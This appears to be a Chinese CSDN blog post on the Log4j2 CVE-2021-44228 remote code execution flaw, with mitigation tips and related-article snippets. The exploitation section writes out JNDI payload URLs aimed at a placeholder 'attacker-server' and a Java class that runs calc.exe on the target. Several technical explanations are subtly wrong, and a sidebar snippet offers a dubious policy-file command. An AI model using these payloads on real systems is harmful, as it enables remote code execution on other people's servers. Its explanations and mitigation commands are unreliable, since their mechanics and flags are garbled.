【Log4j2 CVE-2021-44228】

最新推荐文章于 2024-04-16 07:48:07 发布
最新推荐文章于 2024-04-16 07:48:07 发布
阅读量389 收藏
点赞数
分类专栏: 漏洞复现 文章标签: log4j java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55213436/article/details/129284003
版权

  Log4j是Java编程语言中最常用的日志框架之一。然而,最近发现了一个严重的漏洞,该漏洞被标记为CVE-2021-44228。攻击者可以利用此漏洞执行远程代码,并可能导致目标系统被完全控制。在本篇文章中,我们将探讨Log4j2漏洞的细节和如何利用该漏洞。

漏洞的背景

  漏洞的根本原因是在Log4j2的JNDI查找代码中,存在一个可以远程执行代码的漏洞。JNDI是Java中的一个命名和目录服务,它允许应用程序查找和访问命名和目录服务中的对象。通过使用JNDI来查找日志配置文件,攻击者可以注入一个恶意的JNDI URL,并迫使Log4j2框架执行远程的Java代码。这个漏洞的危害非常严重,因为攻击者可以利用它远程执行任意的Java代码,例如下载恶意软件、修改或删除数据、窃取敏感信息等等。

漏洞的利用

  要利用此漏洞,攻击者需要向目标系统发送一个包含恶意JNDI URL的日志消息。当Log4j2框架尝试加载配置文件时,它会解析这个JNDI URL,并执行其中的代码。攻击者可以在JNDI URL中注入任意的Java代码,例如:

ldap://attacker-server:1389/ExploitObject

攻击者可以在“ExploitObject”对象中嵌入任意的Java代码。例如,以下代码会在目标系统上执行“calc.exe”程序:

rmi://attacker-server:1099/ExploitObject

public class ExploitObject extends UnicastRemoteObject implements Remote {
    public ExploitObject() throws RemoteException {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

此外,攻击者还可以使用其他协议,例如http、https、file等等。以下是一个包含恶意代码的示例URL:

ldap://attacker-server:1389/ExploitObject

要利用此漏洞,攻击者需要找到目标系统中正在运行的Java应用程序,并确定它是否使用了Log4j2框架。如果是,则攻击者可以尝试向该应用程序发送一个包含恶意JNDI URL的日志消息。如果成功,攻击者将获得对目标系统的远程访问权限。

漏洞的解决方案

Log4j2漏洞已被修复,建议使用最新版本的Log4j2框架来修复此漏洞。最新版本的Log4j2框架中已经禁用了JNDI查找功能,以防止攻击者注入恶意JNDI URL。如果您正在使用旧版Log4j2框架,请尽快升级到最新版本,并避免在日志消息中包含任何敏感信息。

此外,还可以采取以下措施来减轻此漏洞的风险:

  1. 防火墙:在网络边界上配置防火墙,限制外部服务器对内部服务器的访问。

  2. 漏洞扫描:使用漏洞扫描工具来检测是否存在Log4j2漏洞。

  3. 日志审计:对所有入站和出站的日志消息进行审计,并及时警报任何可疑的日志消息。

  4. 跟踪应用程序:监控应用程序的行为,包括网络流量、进程行为和系统事件等。

Log4j2漏洞是一个严重的安全问题,需要采取适当的措施来防止攻击。最好的方法是升级到最新版本的Log4j2框架,并实施其他安全措施来降低此漏洞的风险。

网安第一深禽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-26084
weixin_51387754的博客
09-23 2199
在 Confluence Server 和 Data Center 的受影响版本中,存在 OGNL 注入漏洞,允许未经身份验证的攻击者在 Confluence Server 或数据中心实例上执行任意代码。受影响的版本分别为 6.13.23 之前的版本、7.4.11 之前的 6.14.0 版本、7.11.6 之前的 7.5.0 版本和 7.12.5 之前的 7.12.0 版本。 #!/usr/bin/env python3 # -*- encoding: utf-8 -*- """ @File :
CVE-2021-3019
weixin_48300170的博客
07-19 376
CVE-2021-3019 Linux Lanproxy 任意文件读取漏洞复现漏洞简介漏洞信息环境搭建漏洞复现修复建议 漏洞简介       lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面…),该漏洞允许目录遍历读取/…/conf/config.properties来获取到内部网连接的凭据。 影响版本   
log4j关于JNDI注入漏洞验证及修复
影子的博客
12-11 7499
log4j关于JNDI注入漏洞验证及修复一、漏洞说明二、漏洞检测方案三、影响范围四、影响组件五、彻底解决方案六、临时缓解方案七、漏洞复现八、本地编译log4j-2.15.0-rc版本方法1、下载源码2、安装JDK8、9、11。3、用idea打开源码4、修改toolchains-sample-win.xml文件的JDK安装路径5、修改maven的conf目录下的toolchains.xml文件,设置java11的安装路径6、编译安装到本地仓库 一、漏洞说明 漏洞原理官方表述:Apache Log4j2 中存在
Log4j2 JNDI漏洞复现测试
sleetdream的博客
12-15 1275
一、系统环境 组件 版本 Ubuntu 20.04 二、简要说明 1、jar包说明 名称 作用 hacker-0.0.1-SNAPSHOT.jar 攻击者 target-0.0.1-SNAPSHOT.jar 攻击目标 2、攻击说明 (1)hacker启动一个RMI服务,端口号1099,绑定了evil路径,返回“com.example.target.service.HackerTest”的依赖。 (2)target记录一条日志,内容为“${jndi:rmi://lo
分析Apache Log4j2 远程代码执行漏洞_log4j2漏洞2,2024年最新网络安全性能优化最佳实践
最新发布
2401_83739777的博客
04-16 1053
Log4j是Apache的一个开源项目,通过使用Log4j,可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;Apache Log4j2是 Log4j的升级版本,据分析,该漏洞产生的原因在于Log4j在记录日志的过程中会对日志内容进行判断,如果内容中包含了${,则Log4j会认为此字符属于可替换的变量,并且Log4j支持JNDI远程加载的方式替换变量值。
Log4j2安全 JNDI漏洞 CVE-2021-44228
Keep learing, and stay fast
12-15 1559
12 月 10 日,Apache 开源项目 Log4j 的远程代码执行漏洞(CVE-2021-44228) 被公开
apache log4j漏洞复现
arissa666的博客
10-17 605
log4j是开源的java存储日志的框架,一般都是大企业用,小企业自带的日志功能足够使用,Log4j2是默认支持解析ldap/rmi协议的,打印的日志中包括ldap/rmi协议都行。影响版本:apache log4j 2.2.0-2.14.1版本。
一文读懂面试官都在问的Log4J2漏洞
YangYubo091699的博客
04-11 5112
​ Apache log4j2-RCE 漏洞是由于Log4j2提供的lookup功能下的JndiLookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的信息进行判断,导致Log4j2请求远程主机上的含有恶意代码的资源 并执行其中的代码,从而造成远程代码执行漏洞。​
Apache log4j2漏洞
m0_63645854的博客
06-13 566
本文介绍了log4j2的远程代码执行漏洞
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 4668
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
log4j2反序列化漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-02 535
Log4j 是一个流行的Java日志框架,用于记录应用程序的日志信息并进行日志管理。它提供了高度可配置的日志输出,可以将日志信息输出到控制台、文件、数据库等多种目标。它采用了模块化的架构,包含多个组件,如日志器(Logger)、输出器(Appender)、格式器(Layout)、过滤器(Filter)等。这些组件可以根据需要进行配置和组合,以满足各种日志记录需求。
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
log4j-api-2.15.0-rc2.jar
12-10
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)2.15.0-rc2版本(jar包名称仍为2.15.0,源码编译出来的)
Log4j-2.15.0-rc2.zip
12-10
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228) 包含log4j-slf4j-impl-2.15.0.jar、log4j-1.2-api-2.15.0.jar、log4j-core-2.15.0.jar、log4j-web-2.15.0.jar、log4j-api-2.15.0.jar
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 1249
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
Log4j2漏洞详解(自学)
m0_64481831的博客
03-05 1418
Log4j2是Apache下的流行的Java日志框架,用于记录应用程序的日志信息并进行日志管理。它提供了高度可配置的日志输出,可以将日志信息输出到控制台、文件、数据库等多种目标,被应用于业务系统开发,用于记录程序输入输出日志信息。Log4j2是Apache的日志框架,用来记录和管理日志信息的。Log4j2漏洞的原理是因为默认支持解析LDAP/RMI协议,且使用了占位符如{},并会解析里面的内容进行替换,所以攻击者就可以利用这一点构建特殊的恶意的占位符来进行攻击。
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
apache log4j CVE-2021-44228漏洞怎么解决
06-03
漏洞描述: Apache Log4j 2.x中存在一种命令注入漏洞,攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修复此漏洞的版本2.17.0,建议用户尽快升级到该版本。 2.使用安全策略文件 在升级之前,可以通过使用安全策略文件来限制日志信息中使用的类和方法,以减少攻击面。可以使用以下命令生成策略文件: ``` java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将策略文件放置在类路径下,例如在Tomcat中,可以将其放置在`$CATALINA_BASE/conf`目录下。 3.禁用Log4j JNDI Lookup功能 如果无法立即升级,可以通过在JVM参数中添加以下选项来禁用Log4j JNDI Lookup功能: ``` -Dlog4j2.formatMsgNoLookups=true ``` 或者在log4j2.xml配置文件中添加以下选项: ``` <Configuration> <properties> <property name="log4j2.formatMsgNoLookups">true</property> </properties> ... </Configuration> ``` 以上是针对Apache Log4j 2.x的解决办法,如果您使用的是其他版本的Log4j,请查看厂商的官方文档或者联系技术支持获取解决办法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值